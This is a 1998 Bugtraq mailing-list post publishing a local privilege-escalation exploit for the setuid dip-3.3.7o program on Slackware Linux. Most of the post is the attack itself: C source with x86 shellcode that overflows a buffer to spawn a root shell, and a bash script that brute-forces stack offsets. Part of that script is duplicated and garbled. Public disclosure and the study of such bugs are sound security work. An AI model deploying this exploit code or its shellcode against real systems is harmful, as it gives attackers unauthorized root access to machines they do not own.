Bugtraq mailing list archives
dip-3.3.7o exploit
From: zef () PROMISC NET (zef)
Date: Fri, 8 May 1998 01:14:21 +0000
The following code causes a buffer overrun in dip-3.3.7o that comes with linux slakware version 3.4 and maybe others. It can give you root permission if dip file is owned by root and set-user-id bit is set. This problem was mentioned in this list some days ago by Goran Gajic, and he has also posted some possible ways to correct it. The code is too messy... but it works. Regards, zef ------------------------------ dipr.c ----------------------------- /* * dip-3.3.7o buffer overrun 07 May 1998 * * sintax: ./dipr <offset> * * * offset: try increments of 50 between 1500 and 3000 * * tested in linux with dip version 3.3.7o (slak 3.4). * * by zef and r00t @promisc.net * * http://www.promisc.net */ #include <stdio.h> #include <stdlib.h> static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int jump,i,n; unsigned long xaddr; char *cmd[5], buf[4096]; char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; jump=atoi(argv[1]); for (i=0;i<68;i++) buf[i]=0x41; for (n=0,i=68;i<113;i++) buf[i]=code[n++]; xaddr=getesp()+jump; buf[i]=xaddr & 0xff; buf[i+1]=(xaddr >> 8) & 0xff; buf[i+2]=(xaddr >> 16) & 0xff; buf[i+3]=(xaddr >> 24) & 0xff; buf[i+4]=xaddr & 0xff; buf[i+5]=(xaddr >> 8) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+6]=(xaddr >> 16) & 0xff; buf[i+7]=(xaddr >> 24) & 0xff; cmd[0]=malloc(17); strcpy(cmd[0],"/sbin/dip-3.3.7o"); cmd[1]=malloc(3); strcpy(cmd[1],"-k"); cmd[2]=malloc(3); strcpy(cmd[2],"-l"); cmd[3]=buf; cmd[4]=NULL; execve(cmd[0],cmd,NULL); } ------------------------------- end ------------------------------- Shell script for easy testing :-) ---------------------------- dipr.test ---------------------------- #/bin/bash if [ ! -x /sbin/dip-3.3.7o ] then echo "could not find file \"/sbin/dip-3.3.7o\""; exit -1 fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] fi if [ ! -u /sbin/dip-3.3.7o ] then echo "dip executable is not suid" exit -1 fi if [ ! -x ./dipr ] then echo "could not find file \"./dipr\""; echo "try compiling dipr.c" exit -1 fi x=2000 false while [ $x -lt 3000 -a $? -ne 0 ] do echo offset=$x x=$[x+50] ./dipr $x done rm -f core ------------------------------- end -------------------------------
Current thread:
- Re: 3Com switches - undocumented access level. Mike Richichi (May 05)
- Re: 3Com switches - undocumented access level. Doug Hughes (May 06)
- <Possible follow-ups>
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Jean-Francois Malouin (May 06)
- Re: 3Com switches - undocumented access level. Riku Meskanen (May 07)
- dip 3.3.7 exploit jamez (May 07)
- dip-3.3.7o exploit zef (May 07)
- Re: 3Com switches - undocumented access level. Eric Monti (May 07)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- NSCA HTTPD (for Windows) bug. Renos (May 08)
- 4 Advisories for Digital Unix: ftp, advs, rpc.statd, ftpd Helmut Springer (May 08)
- xterm exploit [TOG issue] Andrea Arcangeli (May 08)
- BSDI 3.1/Squid Default Owner Jonathan A. Zdziarski (May 07)
- Re: 3Com switches - undocumented access level. Toh Chang Ying (May 08)
- Re: 3Com switches - undocumented access level. Aleph One (May 08)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)